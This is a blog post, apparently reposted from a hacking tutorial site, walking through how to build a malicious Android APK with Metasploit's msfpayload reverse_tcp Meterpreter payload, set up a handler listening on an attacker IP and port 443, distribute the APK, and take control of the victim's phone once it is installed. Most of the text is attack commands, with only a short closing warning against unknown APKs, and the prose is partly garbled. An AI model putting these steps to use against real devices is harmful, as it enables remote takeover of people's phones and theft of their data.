This post is provided by hacking-tutorials.com
Nowadays mobile users are increasing day by day, the security threat is also increasing together with the growth of its users. Our tutorial for today is how to hacking. Android Smartphone Tutorial using Metasploit. Why we choose android phone for this tutorial? simply because lately android phone growing very fast worldwide. Here in China you can get android phone for only US$ 30 it’s one of the reason why android growing fast.
Here is some initial information for this tutorial:
Attacker IP address: 192.168.8.94
Attacker port to receive connection: 443
Requirements:
1. Metasploit framework (we use Kali Linux 1.0.6 in this tutorial)
2. Android smartphone (we use HTC One android 4.4 KitKat)
Step by Step Hacking Android Smartphone Tutorial using Metasploit:
1. Open terminal (CTRL + ALT + T) view tutorial how to create linux keyboard shortcut.
2. We will utilize Metasploit payload framework to create exploit for this tutorial.
msfpayload android/meterpreter/reverse_tcp LHOST=<attacker_ip_address> LPORT=<port_to_receive_connection>
As described above that attacker IP address is 192.168.8.94, below is our screenshot when executed the command
3.
Because our payload is reverse_tcp where attacker expect the victim to
connect back to attacker machine, attacker needs to set up the handler
to handle incoming connections to the port already specified above. Typemsfconsole to go to Metasploit console.
Info:
useexploit/multi/handler–> we will use Metasploit handler
set payload android/meterpreter/reverse_tcp–> make sure the payload is the same with step 2
4. The next step we need to configure the switch for the Metasploit payload we already specified in step 3.
Info:
set lhost 192.168.8.94–> attacker IP address
set lport 443 –> port to listen the reverse connection
exploit –> start to listen incoming connection
5.
Attacker already have the APK’s file and now he will start distribute
it (I don’t need to describe how to distribute this file, internet is
the good place for distribution
).
).
6.
Short stories the victim (me myself) download the malicious APK’s file
and install it. After victim open the application, attacker Metasploit
console get something like this:
7. It’s mean that attacker already inside the victim android smartphone and he can do everything with victim phone.
Conclusion:
1. Don’t install APK’s from the unknown source.
2.
If you really want to install APK’s from unknown source, make sure you
can view, read and examine the source code. The picture below is the
source code of our malicious APK’s in this tutorial.
Hi. I’m the Author of this blog. I’m A student. I’m I'm learning Programming, Web Designer, Web Developer,I’m a new user of blogger. Inspired to make things looks better.Help me to Make my Blog better for you
0 comments:
Post a Comment